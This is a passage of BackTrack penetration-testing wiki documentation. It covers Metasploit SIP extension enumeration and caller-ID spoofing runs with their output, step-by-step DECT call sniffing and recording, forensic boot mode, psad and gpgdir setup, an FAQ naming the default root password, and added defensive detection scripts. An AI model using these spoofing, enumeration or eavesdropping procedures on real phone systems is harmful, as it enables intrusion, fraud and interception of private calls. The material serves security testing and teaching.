[*] 192.168.1.130 200 server='Asterisk PBX 1.6.2.13' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Enumerating SIP extensions / Usernames

The scanner/sip/enumerator auxiliary can be used to discover valid SIP accounts. It supports two methods of discovery, OPTIONS and REGISTER, and it also comes in two flavors, TCP and UDP. Auxiliary options:

msf > use scanner/sip/enumerator
msf auxiliary(enumerator) > show options

Module options (auxiliary/scanner/sip/enumerator):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   CHOST                       no        The local client address
   CPORT      5060             no        The local client port
   MAXEXT     9999             yes       Ending extension
   METHOD     REGISTER         yes       Enumeration method to use OPTIONS/REGISTER
   MINEXT     0                yes       Starting extension
   PADLEN     4                yes       Cero padding maximum length
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   THREADS    1                yes       The number of concurrent threads

Example Usage:

msf auxiliary(enumerator) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(enumerator) > set MINEXT 100
MINEXT => 100
msf auxiliary(enumerator) > set MAXEXT 500
MAXEXT => 500
msf auxiliary(enumerator) > set PADLEN 3
PADLEN => 3
msf auxiliary(enumerator) > run

[*] Found user: 200 <sip:[email protected]> [Auth]
[*] Found user: 201 <sip:[email protected]> [Auth]
[*] Found user: 202 <sip:[email protected]> [Auth]
[*] Found user: 203 <sip:[email protected]> [Auth]
[*] Found user: 204 <sip:[email protected]> [Auth]
[*] Found user: 300 <sip:[email protected]> [Auth]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
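As an added defender-side example (not code from the wiki, from inviteflood or from Metasploit), the following Python script shows what the INVITE flood from the Denial of Service section and the extension sweep performed by scanner/sip/enumerator look like from the PBX side, and how both can be flagged from a feed of SIP requests: a burst of INVITEs from one source inside a short window, and REGISTER/OPTIONS requests from one source aimed at many distinct extensions. The event layout (timestamp, source IP, raw SIP message), the sample messages and the thresholds are constructed assumptions for this example.

```python
"""Flag SIP INVITE floods and extension sweeps from a feed of SIP requests.

Added example for the BackTrack wiki text above; it is not code from the
wiki, from inviteflood or from Metasploit.  The event layout
(timestamp, source IP, raw SIP message), the sample messages and the
thresholds are constructed assumptions for this example.
"""
import re
from collections import defaultdict, deque


def parse_sip_message(raw):
    """Split a raw SIP message into its start line and a lower-cased header
    dict.  Repeated headers are joined with ', '; the body is ignored."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    start = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break                                   # blank line ends the headers
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    if start[0].upper().startswith("SIP/"):
        return {"kind": "response", "status": int(start[1]), "headers": headers}
    return {"kind": "request", "method": start[0].upper(),
            "uri": start[1], "headers": headers}


def sip_user(addr):
    """User part of a SIP address: '200 <sip:200@pbx>;tag=x' -> '200',
    '<sip:192.168.1.104>' -> '' (no user part)."""
    m = re.search(r"sips?:([^@;>\s]+)@", addr)
    return m.group(1) if m else ""


def detect_sip_abuse(events, window=10.0, invite_threshold=20, sweep_threshold=10):
    """events: iterable of (timestamp_seconds, src_ip, raw_sip_message) in
    time order.  A source is flagged once for an INVITE flood (at least
    invite_threshold INVITEs inside a sliding window of `window` seconds)
    and once for an extension sweep (REGISTER/OPTIONS aimed at at least
    sweep_threshold distinct users).  Returns a list of (alert, src, count)."""
    invite_times = defaultdict(deque)
    probed = defaultdict(set)
    flagged = set()
    alerts = []
    for ts, src, raw in events:
        msg = parse_sip_message(raw)
        if msg["kind"] != "request":
            continue
        if msg["method"] == "INVITE":
            q = invite_times[src]
            q.append(ts)
            while q[0] < ts - window:               # drop INVITEs outside the window
                q.popleft()
            if len(q) >= invite_threshold and ("invite_flood", src) not in flagged:
                flagged.add(("invite_flood", src))
                alerts.append(("invite_flood", src, len(q)))
        elif msg["method"] in ("REGISTER", "OPTIONS"):
            # The enumerator puts the probed extension in To:, so prefer it.
            target = sip_user(msg["headers"].get("to", "")) or sip_user(msg["uri"])
            if target:
                probed[src].add(target)
                if len(probed[src]) >= sweep_threshold and ("extension_sweep", src) not in flagged:
                    flagged.add(("extension_sweep", src))
                    alerts.append(("extension_sweep", src, len(probed[src])))
    return alerts


def _request(method, user, host, src_ip, call_id):
    """Build a minimal SIP request (constructed sample, not captured traffic)."""
    return (f"{method} sip:{user}@{host} SIP/2.0\r\n"
            f"Via: SIP/2.0/UDP {src_ip};branch=z9hG4bK{call_id}\r\n"
            f"From: <sip:{src_ip}>;tag=abcd\r\n"
            f"To: <sip:{user}@{host}>\r\n"
            f"Call-ID: {call_id}@{src_ip}\r\n"
            f"CSeq: 1 {method}\r\n"
            f"Content-Length: 0\r\n\r\n")


def build_sample_events():
    """Constructed feed: three benign calls, one INVITE flood against a
    nonexistent extension (25 INVITEs in 2.5 s) and one REGISTER sweep over
    extensions 100-115.  Addresses are assumptions, not real hosts."""
    pbx = "192.168.1.104"
    events = []
    for i in range(3):
        events.append((i * 20.0, "192.168.1.20",
                       _request("INVITE", "201", pbx, "192.168.1.20", f"ok{i}")))
    for i in range(25):
        events.append((30.0 + i * 0.1, "192.168.1.105",
                       _request("INVITE", "9999", pbx, "192.168.1.105", f"fl{i}")))
    for ext in range(100, 116):
        events.append((40.0 + (ext - 100) * 0.5, "192.168.1.106",
                       _request("REGISTER", str(ext), pbx, "192.168.1.106", f"en{ext}")))
    return sorted(events, key=lambda e: e[0])


if __name__ == "__main__":
    for alert in detect_sip_abuse(build_sample_events()):
        print(alert)
```

The benign source never accumulates twenty INVITEs inside one window, so only the flooding and sweeping sources are reported, each exactly once; on a real PBX the feed would come from its SIP debug log or a capture, and the thresholds would be tuned to the site's normal call rate.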

Spoofing Caller ID auxiliary

The voip/sip_invite_spoof auxiliary will create a fake SIP INVITE request, making the targeted device ring and display fake caller ID information. Auxiliary options:

msf > use voip/sip_invite_spoof
msf auxiliary(sip_invite_spoof) > show options

Module options (auxiliary/voip/sip_invite_spoof):

   Name     Current Setting         Required  Description
   ----     ---------------         --------  -----------
   MSG      The Metasploit has you  yes       The spoofed caller id to send
   RHOSTS                           yes       The target address range or CIDR identifier
   RPORT    5060                    yes       The target port
   SRCADDR  192.168.1.1             yes       The sip address the spoofed call is coming from
   THREADS  1                       yes       The number of concurrent threads

Example Usage:

msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(sip_invite_spoof) > run

[*] Sending Fake SIP Invite to: 192.168.1.104
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploiting VoIP systems

Metasploit includes several exploits for SIP client software and even for the Trixbox PBX web management interface. Although the latter is not a SIP-specific vulnerability, it is still related and can give an attacker full control of a PBX.

Closing Words

I hope you've found this document informative; please keep in mind that BackTrack Linux provides many tools and features we haven't covered here. Take the time to browse the tools, read the manuals and READMEs; I am sure you'll find the right tool for the job.

Feel free to discuss the tools and methods mentioned here in the BackTrack Linux Forums; we would love to hear your feedback, ideas and experiences.

http://www.backtrack-linux.org/forums/

About The Author

Shai Rod (aka @NightRang3r) is a full time Pen Tester at Avnet Information Security & Risk Management in Israel; he holds the Offensive Security OSCP and OSCE certifications (among others) and manages his blog at http://exploit.co.il


What is DECT?

http://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications

The problem?

Most vendors don't implement encryption in their devices, so one can sniff it with certain hardware and software.

For a previous post on the topic, check: http://www.offensive-security.com/backtrack/sniffing-dect-phones-the-details/

Tested on

BackTrack 5 final x86 KDE with kernel 2.6.38
Original Dosch&Amand Type II PCMCIA Card
SIEMENS C1 DECT Phones set up in repeater mode

NOTE: This is experimental software which is not very actively supported anymore!

Installing dedected

In order to get dedected installed on BackTrack, you have the choice between:

1. Use dedected from the BackTrack 5 repositories.

2. Compile it on your own if you want to experiment.

Install from repository

root@bt:~# apt-get update
root@bt:~# apt-get install dedected

Install from source

This stage is optional for those wanting to build the tools from source code.

root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/
root@bt:~# cd /pentest/telephony
root@bt:~# svn co https://dedected.org/svn/trunk dedected_svn
root@bt:~# cd dedected_svn/com-on-air_cs-linux/
root@bt:~# make && make -C tools

Install some additional tools

root@bt:~# apt-get -y install audacity

Load the drivers

root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux
root@bt:~# make node

If you have not yet inserted your Dosch&Amand Type 2 or Type 3 or Voo:doo PCMCIA card, do so now! Next, we load the driver:

root@bt:~# make load

Scan for fixed parts a.k.a. fp (DECT base stations)

root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux/tools
root@bt:~# ./dect_cli

If you need info on the usage type "help". If you live in the U.S. switch to the US/DECT 6 band via the "band" command. Let's enable some verbosity:

verb

And start scanning for base stations:

fpscan

After scanning 2-3 times through all channels disable verbosity, and stop scanning:

verb
stop

Ignore phones you don't want to sniff (e.g. your neighbours!)

Start a callscan

callscan

Now grab your DECT handset, make a test phone call and wait until you see the call appear. It is also sufficient if you just get a dialing tone. You should see something like:

### found new call on 00 82 31 33 73 on channel 7 RSSI 34

stop

Name your basestation if you want:

name 00 82 31 33 73 stallowned

Dump all found phones:

dump

Ignore every other phone except yours via the following command! IMPORTANT!!!

ignore 01 30 95 13 37

Record the phone call

Start automatic recording of every phone call it detects:

autorec

Now grab your DECT telephony handset and do a test call. I recommend calling a "time telling service" that can be reached over a normal phone number. You should get something like this:

### starting autorec
### stopping DIP
### starting callscan
### trying to sync on 00 82 ab b0 29
### got sync
### dumping to dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap
### stopping DIP

After you hang up your phone call the dumping should stop.

Decode the call out of the datastream

Stop the autorec:

stop

Decode the audiostream out of the raw dump:

root@bt:~# ./decode.sh

Import the streams into audacity and listen to the calls

Start audacity via "alt + f2", then type "audacity" and press enter. Import the fixed-part and the portable-part .wav files from /pentest/telephony/dedected/com-on-air_cs-linux/tools via File -> Import -> Audio or simply "ctrl + shift + I". Import the files which end in .pcap_fp.ima.g721.wav and .pcap_pp.ima.g721.wav.

Play your phone call with the play button.

Hint: if you can only hear noise, your phone seems to use some encoding/encryption. You can enable the repeater mode in your telephone so it disables encryption, and you can then test whether your setup is working properly.

Clean up / Reload

If you need to reload the drivers:

root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux
root@bt:~# make reload

If you're finished and want to clean up:

root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux
root@bt:~# make unload
root@bt:~# rm /dev/coa

DECT protocol

If you are interested in more details of the protocol you can open the .pcap file in Wireshark.

Forensics Boot

Since BackTrack 4, and now BackTrack 5, you may have noticed that BackTrack has a "BackTrack Forensics" boot option, but what exactly is that?

LiveCD and Forensics

For a long time now, Linux Live CDs have been very useful for forensic acquisition purposes in instances where for one reason or another you can't utilize a hardware write blocker. When configured not to automount drives, and with a little bit of know-how, a Linux Live CD can be a wonderful software write blocker. For a Linux Live CD to be considered for this purpose, however, it is of the utmost importance that the use of the Live CD in no way alters any data in any manner. That's the main reason BackTrack was ruled out in the past: BackTrack would automount available drives and utilize swap partitions where available, and by doing this BackTrack could have caused all sorts of havoc, changing last mount times, altering data on disk, and so on. But since BackTrack 4, and now BackTrack 5, that's not the case anymore.

How?

So, let's have the scoop. Forensic people are often detail oriented and very conservative, so how do we know it is safe to use? Well, first off, the BackTrack 5 Live CD is based on Casper and contains no filesystem automount scripts at all. The system initialization scripts have been altered in the forensic boot mode so that BackTrack 5 will not look for or make use of any swap partitions which are contained on the system. All those scripts have been removed from the system.

Verification:

To test this functionality, we have tested this boot mode with multiple hardware configurations. For each test, we took a "before" MD5 snapshot of the system disks, booted BackTrack 5 in forensic boot mode, verified that no file systems were mounted and swap was not in use, did a number of activities on the system, then shut the system back down and took an "after" MD5 snapshot. In comparing the two MD5 snapshots, in every case they were a match, demonstrating that no changes had been made to the disks.
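The before/after snapshot described above, as an added example (not the BackTrack team's own test scripts): it hashes the evidence devices in chunks, diffs two snapshots, and checks /proc/mounts and /proc/swaps so that the "no file systems mounted, swap not in use" condition is verified rather than assumed. Device paths, the /proc sample text and the SHA-256 default (the text used MD5, which is still available through the algorithm parameter) are assumptions of this example.

```python
"""Before/after hash snapshots for a forensic boot check.

Added example (not the BackTrack team's own test scripts) of the
verification described above: hash the evidence devices, diff the
snapshots, and confirm from /proc/mounts and /proc/swaps that nothing on
the evidence disk is mounted or used as swap.  Device paths, the /proc
sample text and the SHA-256 default (the text used MD5) are assumptions.
"""
import hashlib
import io
import re

CHUNK = 1 << 20          # hash 1 MiB at a time so whole disks never sit in RAM


def hash_stream(fileobj, algorithm="sha256"):
    """Hex digest of an open binary stream, read chunk by chunk."""
    h = hashlib.new(algorithm)
    for chunk in iter(lambda: fileobj.read(CHUNK), b""):
        h.update(chunk)
    return h.hexdigest()


def hash_bytes(data, algorithm="sha256"):
    """Same as hash_stream but for in-memory data (used by the self-test)."""
    return hash_stream(io.BytesIO(data), algorithm)


def snapshot(device_paths, algorithm="sha256"):
    """Map each device or image path to its digest, e.g. {'/dev/sda': '...'}.
    Devices are opened read-only; on the forensic boot they are never mounted."""
    digests = {}
    for path in device_paths:
        with open(path, "rb") as f:
            digests[path] = hash_stream(f, algorithm)
    return digests


def compare_snapshots(before, after):
    """Return {path: (before_digest, after_digest)} for every path whose
    digest differs or that is present in only one snapshot; {} means the
    disks are byte-for-byte unchanged."""
    changed = {}
    for path in sorted(set(before) | set(after)):
        if before.get(path) != after.get(path):
            changed[path] = (before.get(path), after.get(path))
    return changed


def devices_in_use(mounts_text, swaps_text):
    """Device paths that appear as mounted in /proc/mounts or as active
    swap in /proc/swaps (whose first line is a column header)."""
    used = set()
    for line in mounts_text.splitlines():
        fields = line.split()
        if fields and fields[0].startswith("/dev/"):
            used.add(fields[0])
    for line in swaps_text.splitlines()[1:]:
        fields = line.split()
        if fields and fields[0].startswith("/dev/"):
            used.add(fields[0])
    return used


def evidence_disk_untouched(disk, mounts_text, swaps_text):
    """True if neither `disk` (e.g. /dev/sda) nor any of its partitions
    (/dev/sda1, /dev/nvme0n1p2) is mounted or in use as swap."""
    partition = re.compile(re.escape(disk) + r"p?\d+$")
    return not any(d == disk or partition.match(d)
                   for d in devices_in_use(mounts_text, swaps_text))


# Constructed /proc contents (assumed, not captured): the ISO is loop-mounted,
# a USB stick sdb1 is mounted, and swap on sda5 is active, as a standard
# (non-forensic) boot would leave it.
SAMPLE_MOUNTS = (
    "rootfs / rootfs rw 0 0\n"
    "/dev/loop0 /cdrom iso9660 ro 0 0\n"
    "/dev/sdb1 /media/usb vfat rw 0 0\n"
)
SAMPLE_SWAPS = (
    "Filename\t\t\t\tType\t\tSize\tUsed\tPriority\n"
    "/dev/sda5                               partition\t1048572\t0\t-1\n"
)

if __name__ == "__main__":
    print("sda untouched:", evidence_disk_untouched("/dev/sda", SAMPLE_MOUNTS, SAMPLE_SWAPS))
    print("sdc untouched:", evidence_disk_untouched("/dev/sdc", SAMPLE_MOUNTS, SAMPLE_SWAPS))
    # On the forensic boot itself (paths are placeholders for your evidence disk):
    #   before = snapshot(["/dev/sda"]); ... do the test activities ...
    #   after = snapshot(["/dev/sda"]); print(compare_snapshots(before, after))
```

In live use the mounts and swaps text come from open("/proc/mounts").read() and open("/proc/swaps").read(); running the check before and after the activity, together with the snapshot diff, gives the two pieces of evidence the text relies on.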

Usage:

When you utilize BackTrack for forensic purposes, be sure you don't let it go through an unattended boot. The default boot for BackTrack is standard boot mode, which will use swap partitions if they are present. There is a nice long delay, however, so you will have plenty of time to select the proper boot mode. Also, please remember, this is a Linux distribution. It is highly suggested that you become familiar with Linux before using this, or any other, Linux Live CD for any forensic purpose. Also, be sure to check out the additional forensic tools added to BackTrack 5. We have concentrated on the addition of imaging and triage tools, but if you find that one of your favorite utilities is not in place please let us know so we can look into having it added.

psad: Intrusion Detection and Log Analysis with iptables

What is PSAD?

PSAD is a collection of three lightweight system daemons (two main daemons and one helper daemon) that run on Linux machines and analyze iptables log messages to detect port scans and other suspicious traffic. A typical deployment is to run psad on the iptables firewall, where it has the fastest access to log data.
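To make concrete what psad does with iptables log data, here is an added Python example (not psad's code) that parses lines in the iptables LOG format and flags sources that probe many distinct destination ports, attaching a simplified danger level. The log lines are constructed samples and the thresholds are assumptions; psad's own signature matching and danger-level logic are considerably richer.

```python
"""A minimal psad-style port-scan detector over iptables LOG lines.

Added example; it is not psad's code.  The log lines are constructed
samples in the iptables LOG format, and the thresholds and danger-level
scale are assumptions simplified from psad's 1-5 levels.
"""
import re
from collections import defaultdict

FIELD_RE = re.compile(r"\b([A-Z]+)=(\S*)")      # KEY=VALUE pairs in a LOG line
TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}


def parse_iptables_log(line):
    """Return the KEY=VALUE fields of an iptables LOG message plus a FLAGS
    set of the bare TCP flag words, or None for any other syslog line."""
    if "IN=" not in line or "SRC=" not in line:
        return None
    rec = dict(FIELD_RE.findall(line))
    rec["FLAGS"] = {word for word in line.split() if word in TCP_FLAGS}
    return rec


def detect_port_scans(lines, port_threshold=5, danger_levels=(5, 15, 50, 250, 1000)):
    """Count distinct (proto, port) targets per source.  TCP packets count
    only when they are pure SYNs (a fresh connection attempt); UDP always
    counts.  Sources reaching port_threshold are reported with a danger
    level equal to the number of danger_levels thresholds they pass."""
    targets = defaultdict(set)
    for line in lines:
        rec = parse_iptables_log(line)
        if not rec or "DPT" not in rec:
            continue
        proto = rec.get("PROTO")
        if proto == "TCP" and rec["FLAGS"] != {"SYN"}:
            continue                     # established traffic, not a probe
        targets[rec["SRC"]].add((proto, int(rec["DPT"])))
    report = {}
    for src, hits in targets.items():
        if len(hits) >= port_threshold:
            level = sum(1 for t in danger_levels if len(hits) >= t)
            report[src] = {"ports": sorted(hits), "level": level}
    return report


def _log(src, proto, dpt, flags="SYN"):
    """Constructed iptables LOG line (sample data, not a captured log)."""
    common = ("Jun 11 21:37:01 bt kernel: DROP IN=eth0 OUT= "
              "MAC=00:0c:29:84:98:b2:00:50:56:c0:00:08:08:00 "
              f"SRC={src} DST=192.168.1.10 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=1 ")
    if proto == "UDP":
        return common + f"PROTO=UDP SPT=44321 DPT={dpt} LEN=40"
    return common + f"PROTO=TCP SPT=44321 DPT={dpt} WINDOW=1024 RES=0x00 {flags} URGP=0"


# One host sweeping seven TCP ports plus DNS, one host doing ordinary web
# traffic (a SYN and a later ACK), and an unrelated kernel message.
SAMPLE_LOG = (
    [_log("192.168.1.50", "TCP", p) for p in (21, 22, 23, 25, 80, 110, 443)]
    + [_log("192.168.1.50", "UDP", 53)]
    + [_log("192.168.1.20", "TCP", 80),
       _log("192.168.1.20", "TCP", 443, flags="ACK"),
       "Jun 11 21:37:02 bt kernel: usb 1-1: new high speed USB device using ehci_hcd"]
)

if __name__ == "__main__":
    for src, info in detect_port_scans(SAMPLE_LOG).items():
        print(f"{src}: danger level {info['level']}, ports {info['ports']}")
```

Feeding it the real file is a matter of detect_port_scans(open("/var/log/messages")) on a box whose iptables rules carry a LOG target; the SYN-only filter is what keeps replies to the firewall's own outbound connections from being mistaken for a scan.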

Installation Process:

Verify md5sum, and public key:

root@bt:~# cd /usr/local/src
root@bt:/usr/local/src# wget http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2
root@bt:/usr/local/src# wget http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2.md5
root@bt:/usr/local/src# wget http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2.asc
root@bt:/usr/local/src# wget http://cipherdyne.org/public_key
root@bt:/usr/local/src# md5sum -c psad-2.1.7.tar.bz2.md5
psad-2.1.7.tar.bz2: OK

root@bt:/usr/local/src# gpg --import public_key
root@bt:/usr/local/src# gpg --verify psad-2.1.7.tar.bz2.asc
gpg: Signature made Wed 14 Jul 2010 06:01:06 PM EDT using DSA key ID 0D3E7410
gpg: Good signature from "Michael Rash (Signing key for cipherdyne.org projects) <[email protected]>"

Install PSAD:

root@bt:/usr/local/src# tar xfj psad-2.1.7.tar.bz2
root@bt:/usr/local/src# cd psad-2.1.7
root@bt:/usr/local/src/psad-2.1.7# ./install.pl

Would you like to install the latest signatures from
http://www.cipherdyne.org/psad/signatures (y/n)? y

Start PSAD:

Notice you will get the following error:

root@bt:/usr/local/src/psad-2.1.7# /etc/init.d/psad start
Starting psad: [*] Could not find mail, edit /etc/psad/psad.conf at /usr/sbin/psad line 9679.

To fix this we will need to edit psad.conf located in /etc/psad/ and add an email address as follows:

root@bt:/usr/local/src/psad-2.1.7# vim /etc/psad/psad.conf

gpgdir - Recursive directory encryption with GnuPG

What is gpgdir?

gpgdir is a perl script that uses the CPAN GnuPG::Interface module to encrypt and decrypt directories using a gpg key specified in ~/.gpgdirrc.

Installation Process:

Verify public key:

root@bt:~# cd /usr/local/src/
root@bt:/usr/local/src# mkdir gpgdir
root@bt:/usr/local/src# cd gpgdir/
root@bt:/usr/local/src/gpgdir# wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2
root@bt:/usr/local/src/gpgdir# wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2.asc
root@bt:/usr/local/src/gpgdir# wget http://cipherdyne.org/public_key
root@bt:/usr/local/src/gpgdir# gpg --import public_key
root@bt:/usr/local/src/gpgdir# gpg --verify gpgdir-1.9.5.tar.bz2.asc

Install gpgdir:

root@bt:/usr/local/src/gpgdir# tar xfj gpgdir-1.9.5.tar.bz2
root@bt:/usr/local/src/gpgdir# cd gpgdir-1.9.5
root@bt:/usr/local/src/gpgdir/gpgdir-1.9.5# ./install.pl

Edit the config file to use the GnuPG default key:

root@bt: vim /usr/local/src/gpgdir

BackTrack Frequently Asked Questions

I've just installed BackTrack, what is the root password?

The ubiquity installer uses the username "root" and the password "toor" by default.

We also recommend you change this as soon as you have rebooted and verified everything is working properly. You can do this by issuing the following command and following the prompts.

passwd root

Why does my keyboard stop working when I try to type the password?

It doesn't, your keyboard is still working.

When you type your password in BackTrack, nothing is shown on the screen. This is a security measure to prevent someone from "shoulder surfing" and being able to see how long your password is, thereby making it more difficult for someone who knows you to guess your password.

How do I start the GUI environment?

After booting from DVD/USB or after logging in on a HDD install, type the following command:

startx

Is BackTrack free for download?

Yes, and it always will be.

Do you offer 64bit or Gnome versions of BackTrack?

Yes, we now offer 64bit and 32bit ISOs, as well as support for ARM based mobile devices. Both the 32bit and 64bit versions come with either Gnome or KDE. You can also use Fluxbox as your WM.

Which version should I download?

We recommend that you download BackTrack 5. We no longer support any other versions.

I've just burned my iso and it will not boot?

The 3 most common problems are: the md5sum is wrong, the program you used to burn the .iso file, or cheap media. Please check these three things before asking for help.

I use Windows and I do not want to mess it up?

BackTrack can be run as a live DVD environment which will not affect your Windows install in any way. If you run the installer and install to hard disk you are responsible for partitioning your drive properly and selecting the correct drive or partition. Guides on installation methods can be found on the Installation page.

Please remember that incorrect selections can completely wipe your hard drive and potentially leave you without your original Windows/Linux installations!

Consider this as your only warning!

I've heard it's stupid to run as root?

Many of the tools in BackTrack need root access to run. BackTrack is a specialized penetration testing distribution. We trust our users know the security risks of running as the root user.

What's the "perfect" laptop to run BackTrack on?

Everyone's version of perfect is different. There is no perfect computer. Please check the forums where users post their thoughts on models of computers.

Please remember to add yours to the list too.

Where is the BackTrack manual?

There is no manual. We do write official documentation on how to install BackTrack and how to use some of the more exotic tools; however, we do not write guides on hacking in general. We have a forum community and a wiki which both contain many user and dev team submitted tutorials. Please also remember to check the manual section of the website for more info on official documentation.

Do you offer any kind of official training?

Check our Offensive Security Training website for the only official BackTrack Training.

Where can I find out more information about BackTrack?

Keep updated with our blog, check our forums and check for BackTrack Fixes here.

Why can't I just add the BackTrack repositories to my Ubuntu install or the Ubuntu repositories to my BackTrack install?

We highly recommend against this action because BackTrack tools are built with many custom features, libraries and kernel. We have no way of knowing how they will perform on a non-BackTrack distribution, plus you will very quickly break your install.

Also, if you choose to add the Ubuntu repositories to your BackTrack install, you will most certainly break your entire BackTrack install very quickly.

We do a lot of testing to ensure that all packages in our repo will work together without causing problems.

If you decide on this course of action you do so entirely at your own risk and the BackTrack team will not offer any support in any way.

I want/need to rebuild the kernel, can you help me?

Firstly, it is very unlikely that you actually have a need to do this. Secondly, if you need help in rebuilding the kernel, then you probably shouldn't be doing it in the first place.

We do a lot of testing to ensure that all of the packages in our repo work with the kernel we supply, and by using your own kernel we have no way of knowing what compatibility will break. We do not support this and will offer no help to those who choose to go ahead and rebuild the kernel.

Sorry, but if you still feel you want/need to rebuild the kernel for whatever reason, you are on your own. We do not support this and will offer no help or answer questions from those who choose to go ahead and rebuild the kernel.

Why don't my network cards show up when I boot?

BackTrack is a penetration testing distribution and as such DHCP requests etc. entering the network when you boot are usually very undesirable. You can easily enable networking by issuing the following command:

/etc/init.d/networking start

Why can't BackTrack use wireless card "X" inside VMware or VirtualBox?

Any virtualisation software can only use USB wireless network cards as physical devices; all other types of wireless card are seen as virtual ethernet devices and can only be seen as a wireless device by the host and not by the guest operating system. So if you want to run BackTrack in VMware or VirtualBox and have full wireless capabilities, make sure you are using a USB device.

Why don't you provide a USB image like you did with previous versions?

Previous versions sometimes required quite complicated methods to install to a USB stick, so for convenience we provided special images for easy installation. With the latest editions of BackTrack we have eliminated this need, as it can easily be installed to a USB stick with tools such as Unetbootin or via the manual methods described in the Installation section of this site.

How do I contact you?

To be honest, in the majority of cases you really don't need to.

Firstly consider this: we each get hundreds of emails and Private Messages both on the forums and in our IRC channel every day. Almost all of these messages are from people asking simple questions that are either covered in this wiki, the FAQ or on the forum itself. Almost every single one of those is a question that should be asked on the forum, as it is either covered there, or the question and its subsequent answer would be of benefit to the entire community rather than just the person asking it. Think of it this way: if you are asking this question, wouldn't it make sense that somebody else may have the same question or may have already asked it? The forum and wiki are valuable sources of information, and that information is only as good as the questions asked and the answers given.

Secondly, all of the team are volunteers, none of us are paid to work on the project and all of us have lives, family, work etc. outside of BackTrack. We all give our free time to the project, and the more of that which is taken up answering these questions, the less time we have to work on making BackTrack even better than it is.

So in short, if your question falls into the description above, then it's in your interest not to email or send a Private Message. It will most likely just get ignored if it does fall into this category.

However, if there is something not covered by the above, then by all means do contact us. You can find all of the dev team in our IRC channel (remember we don't live there all the time), in the forums, or via the contact details on the About page of the website.

Where is the IRC channel you are talking about?

If you would like to join the community and contribute, visit us on irc.freenode.net, in channel #backtrack-linux. Our website will continue to be the main source for all news and updates regarding BackTrack. Be sure to see our channel rules, read the channel topic and remember that you need to be registered to speak.

Important: root ( *root*@* ) is banned by default on this channel, so please ensure you configure your IRC client appropriately.

I'm new to Linux, is BackTrack a good place to start?

Sorry, the simple answer to that is no.

BackTrack is a highly specialized distro, where a lot of normal tasks are not done automatically for you as they are in a mainstream distro.

Our best advice, if you wish to start off using Linux with BackTrack as your first Linux operating system, is: don't.

Start off by downloading a copy of Kubuntu (as it is a similar base operating system to BackTrack), boot into that and force yourself to do everything you are used to doing on a daily basis using that, preferably spending most of your time using the command line tools. When, and only when, you can perform all of those daily tasks without having to look up the commands should you move to BackTrack.

Please don't take this as us saying you shouldn't use BackTrack; take it as friendly advice that you are letting yourself in for a whole world of pain and frustration if you are not fully comfortable performing administration of your own Linux machine before you start with BackTrack.

I have just downloaded and installed the latest version of BackTrack, do I still need to update?

Although you have downloaded the latest release of the ISO or VM, this does not mean you will have the latest packages we provide. BackTrack is developed and updated on a continual basis, and for this reason you should still update your installation at regular intervals to keep yourself up to date with the latest packages, bugfixes and new tools.

When and how often do you update the BackTrack repo with new packages?

Generally the BackTrack repo is updated with the week's new packages late on a Sunday night so that they are available to you on Monday morning.

There are times, however, when we feel that a package needs to be released straight away rather than waiting until the next scheduled Sunday repo update. So in these cases the repo update can happen at any time, day or night, during the week.

Please note that while the repo is being synced, it will be unavailable for downloading packages. This process doesn't take long, so it will be rare for this to cause any of you more than a very short period of unavailability.

How do I update BackTrack with the new packages?

First make sure that you have an internet connection, then use the following commands:

root@bt:~# apt-get update
root@bt:~# apt-get upgrade

Optionally you can run:

root@bt:~# apt-get update
root@bt:~# apt-get dist-upgrade

Where can I find a complete list of all the tools installed in BackTrack?

No such resource currently exists; however, you can see a list of all packages installed on your BackTrack system by running:

dpkg --list

Please remember that this will list all of the packages installed on BackTrack and not just the tools.

You can also search the repository for a particular package of interest by running the following command:

apt-cache search <keyword of interest>